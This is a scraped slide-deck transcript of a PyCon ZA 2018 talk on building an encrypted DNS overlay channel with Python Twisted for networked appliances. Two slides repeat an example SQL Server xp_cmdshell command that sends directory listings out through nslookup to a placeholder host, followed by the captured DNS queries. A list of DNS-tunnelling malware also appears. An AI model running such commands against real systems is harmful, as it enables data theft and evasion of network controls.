Upgrade to Pro — share decks privately, control downloads, hide ads and more …

(Re)solving an appliance traffic dilemma with t...

Pycon ZA
October 12, 2018

(Re)solving an appliance traffic dilemma with the DNS loophole by Marco Slaviero

Cloud-based components are an all too common speed bump when installing new gear or software. While not an issue in home networks, outbound connections are shunned by default in regulated environments. Enabling communications between the newly installed technology and its cloud service then involves change control requests, committees, firewall admins, and (worst of all) delays... hardly the high-speed future we were promised.

Product builders: it doesn't have to be this way. Right now in your network one type of traffic almost certainly can exit your network without restriction: DNS. That VOIP network you think is isolated? Pretty good chance it can resolve DNS.

This is the story of how we grew one of the larger DNS overlay networks around using Python Twisted. We built a secure and reliable channel between thousands of appliances (hardware and virtual) and hundreds of servers, over the inherently unreliable DNS.

The talk covers designing and building custom network channels in Twisted, Twisted limitations we bumped into, unexpected DNS behaviours, challenges in scaling the channel, and more. Network knowledge is useful but not necessary to follow along, and while we used Twisted, the lessons are applicable in other frameworks too. If you've got an hankering for network code, then this heady mix of network stacks and Python hacks is for you!

Pycon ZA

October 12, 2018
Tweet

More Decks by Pycon ZA

Other Decks in Technology

Transcript

  1. Overview Product constraints DNS Primer Let’s build Limits Fragmentation Reliable

    and secure Upper layers Operating the overlay Experiments Wrap up
  2. Deploying devices into enterprise networks Step 1: Reserve rack space

    Step 2: Physically install device Step 3: Forget to call the network person to enable a network point Step 4: Boot up device, realise it wants to talk to its Cloud component via HTTP or custom TCP, or custom UDP Step 5: Apply for proxy creds, and submit a change request for firewall changes Step 6: Continue installation in days to weeks
  3. Device-Console Comms Constraints No network changes to accommodate birds in

    most cases Low bandwidth Intermittent comms are ok Guarantee delivery No snooping
  4. Looking for alternatives Within weeks of committing the SYSLOG comms

    channel, it became apparent that we were going to be every other vendor So we went looking for options
  5. exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir c:\*.`)

    do (nslookup %l. YOUR_IP_HERE)' # tcpdump -n port 53 12:14:47.729725 IP 10.26.79.50.49882 > 10.26.79.1.53: 14387+ A? COMMAND.COM. (29) 12:14:47.891827 IP 10.26.79.50.37263 > 10.26.79.1.53: 82371+ A? AUTOEXEC.BAT. (30) 12:14:47.921539 IP 10.26.79.50.10239 > 10.26.79.1.53: 48372+ A? CONFIG.SYS. (28) …
  6. exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir c:\*.`)

    do (nslookup %l. YOUR_IP_HERE)' # tcpdump -n port 53 12:14:47.729725 IP 10.26.79.50.49882 > 10.26.79.1.53: 14387+ A? COMMAND.COM. (29) 12:14:47.891827 IP 10.26.79.50.37263 > 10.26.79.1.53: 82371+ A? AUTOEXEC.BAT. (30) 12:14:47.921539 IP 10.26.79.50.10239 > 10.26.79.1.53: 48372+ A? CONFIG.SYS. (28) …
  7. We were not the first (by a long shot) Likely

    private tools (90s) NSTX (2000) DeNiSe (2002) OzymanDNS (2004) DNScat (2004) iodine (2006) https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152
  8. Malware using DNS channels Feederbot (2011) Morto (2011) Mufanom (2011)

    AutoTsifiri (2011) Hiloti (2011) Zeus (2012) PlugX (2013) FrameworkPOS (2014) Greenbug (2018) https://passport.exclusive-networks.it/upload/workdoc/Infoblox%20Data%20Exfiltration%20Solution.pdf https://asert.arbornetworks.com/greenbugs-dns-isms/ https://lists.emergingthreats.net/pipermail/emerging-sigs/
  9. What is a DNS? Distributed, hierarchical database Defines a protocol

    for querying the database, plus the database schema
  10. Common use-case Convert hostnames to IPv{4,6} addresses (and vice versa)

    thinkst.com -> 176.9.123.248 Figure out where to send email for a domain @thinkst.com -> ALT1.ASPMX.L.GOOGLE.com. Provide aliases for hostnames myalias.thinkst.com -> thinkst.com
  11. Record types Addresses (IPv4 and IPv6) IP addresses Mail server

    addresses Name server addresses Authority records Aliases … We’ll come back to this
  12. We’re going to skip Recursive vs. iterative queries Forwarding &

    delegation Split horizon DNS Bailiwicks and glue records Trust anchors ….
  13. We can make the responses dynamic The server calculates or

    performs some operation before send a response
  14. But that’s not a lot of data The A record

    is limited, it carries four bytes back The AAAA can hold 16 bytes CNAMEs can carry a whole second hostname TXT records can carry unstructured text (theoretic limit is 65k)
  15. Custom DNS Server We can send arbitrary data back to

    the client Using TXT records Server has no way of initiating comms Client is the OS program
  16. DNS and casing Hostnames are case insensitive Servers SHOULD but

    aren’t REQUIRED to preserve case TXT data should remain untouched
  17. Constant polling Server unable to initiate, so client must poll

    Client polls at a period you’re comfortable with
  18. We want reliability in the face of Server not able

    to initiate traffic Asymmetric size limitations on server and client Packet loss, duplication and reordering Server is publicly accessible to the Internet Ancient DNS servers Result caching No insight into the device’s IP address
  19. DNS lengths that matter Hostnames <= 253 bytes (trailing ‘.’

    always gets added) Labels <= 63 bytes Whole packet <= 512 bytes (avoids TCP) TXT records <= 65535 bytes p y c o n . t h i n k . s t
  20. DNS lengths that matter Hostnames <= 253 bytes (trailing ‘.’

    always gets added) Labels <= 63 bytes Whole packet <= 512 bytes (avoids TCP) TXT records <= 65535 bytes p y c o n . t h i n k . s t
  21. Optimal size 241 bytes for hostname (includes trailing ‘.’) 240

    bytes for TXT response Doesn’t need EDNS0 or TCP Doesn’t always work :/ Header/flags/lengths (13 bytes) Query (241 bytes) Query TYPE/CLASS (4 bytes) Answer header (13 bytes) Response (240 bytes) Total: 511 bytes
  22. DNS doesn’t support this DNS Client (Device) DNS Server (Console)

    Polling request Fragment 1 Fragment 2 Fragment 3
  23. Instead we have to do this DNS Client (Device) DNS

    Server (Console) Polling request Fragment 1 Fragment 2 Request fragment 2 Fragment 3 Request fragment 3
  24. Lossy UDP No guarantees on delivery Twisted’s DNS client includes

    retries with backoff If a client message still hasn’t been ack’d by the server, cache the whole message to disk (not just the individual fragments) Retry the whole message after a timeout (e.g. 1 minute)
  25. NaCl library Python bindings (PyNaCl) Removes cryptographic suites from the

    picture Super simple construction Client and server share a single key (sharing out-of-bound) SecretBox
  26. Quick stats Hundreds of consoles Thousands of devices Devices heartbeat

    every 30 seconds Peak bandwidth is around 200bps ~98% make no changes to their networks Single t2.micro handles the DNS channel for 50 devices with 0.07 load
  27. Parallel requests DNS Client (Device) DNS Server (Console) Req 1

    Fragment 1 Fragment 2 Fragment 3 Req 2 Req 3 Poll Data waiting
  28. Parallel requests performance pulling ~103k Seconds 0 125 250 375

    500 Parallel requests 1 2 5 10 50 100 3,2Kb/s 3,7Kb/s 2,2Kb/s 1,1Kb/s 473b/s 230b/s
  29. Q&A